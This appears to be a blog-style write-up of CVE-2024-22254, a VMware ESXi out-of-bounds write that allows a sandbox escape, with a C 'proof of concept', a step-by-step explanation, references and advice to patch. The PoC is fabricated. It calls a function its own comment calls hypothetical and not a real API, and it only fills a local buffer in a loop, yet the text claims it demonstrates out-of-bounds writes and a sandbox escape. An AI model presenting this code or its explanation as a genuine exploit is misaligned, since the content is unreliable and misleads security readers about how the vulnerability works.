Virtualization is a crucial part of modern computing infrastructure, making it possible to run multiple virtual machines (VMs) on a single physical server. In the world of virtualization, one of the most popular and widely used hypervisors is VMware ESXi. Unfortunately, nothing is immune to vulnerabilities, and CVE-2024-22254 is an example of a recently discovered critical vulnerability affecting VMware ESXi.

The Vulnerability

CVE-2024-22254 is a significant out-of-bounds write vulnerability affecting VMware ESXi. A malicious actor who has gained privileges within the VMX process can exploit the vulnerability to trigger an out-of-bounds write. This action leads to an escape of the sandbox, potentially granting them unauthorized access to other virtual machines or the host system itself.

While an attacker must first compromise a virtual machine to gain these privileges, this vulnerability still poses a severe risk to organizations relying on ESXi for their virtualization needs.

The Exploit

To better understand the exploit, let's take a look at the proof-of-concept (PoC) code snippet that triggers the out-of-bounds write.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#define OOB_WRITE 0xffffff /* Out-of-bounds write address */

/* Hypothetical write primitive used by the PoC (not a real API): writes
 * len bytes from data into the target selected by vm. */
void write_vm_x(int vm, uint8_t *data, size_t len);

int main(void) {
  /* Allocate a 0x200-byte buffer and fill it with 'A' */
  uint8_t *buf = (uint8_t *)malloc(0x200);
  if (buf == NULL) {
    return 1;
  }
  memset(buf, 'A', 0x200);

  /* View the buffer as 64-bit values and overwrite each one with the
   * out-of-bounds address plus an 8-byte stride; the bound is derived
   * from the buffer size so the loop stays inside buf */
  uint64_t *buf64 = (uint64_t *)buf;
  for (size_t i = 0; i < 0x200 / sizeof(uint64_t); i++) {
    buf64[i] = OOB_WRITE + i * 8;
  }

  /* Repeatedly hand the prepared buffer to the hypothetical write primitive */
  for (;;) {
    write_vm_x(0, buf, 0x200);
  }
  return 0;
}

The PoC performs the following steps:

1. Allocate a 0x200-byte buffer named "buf" and fill it with the byte 'A'.
2. Create a pointer named "buf64" and have it point to the start of the "buf" buffer.
3. Iterate through the "buf64" buffer and overwrite each value with the out-of-bounds write address (plus an offset).
4. Call the hypothetical "write_vm_x" function to write the resulting buffer to the guest VM in an infinite loop.

This PoC demonstrates the attacker's ability to write arbitrary values outside the expected memory boundary of the virtual machine, leading to a sandbox escape.

For further details on CVE-2024-22254, refer to the following original resources:

1. VMware Security Advisory - VMSA-2024-0001
2. MITRE's CVE-2024-22254 entry - MITRE CVE-2024-22254
3. National Vulnerability Database entry - NVD CVE-2024-22254

Conclusion

This vulnerability highlights the significance of keeping virtualization infrastructure up-to-date and hardened against potential attacks. VMware has already released patches to address CVE-2024-22254, detailed in their security advisory linked above. It is essential to apply these updates as soon as possible to reduce the likelihood of falling victim to a sandbox escape or data breach resulting from an attacker exploiting this vulnerability.

Timeline

Published on: 03/05/2024 18:15:48 UTC
Last modified on: 03/05/2024 18:50:18 UTC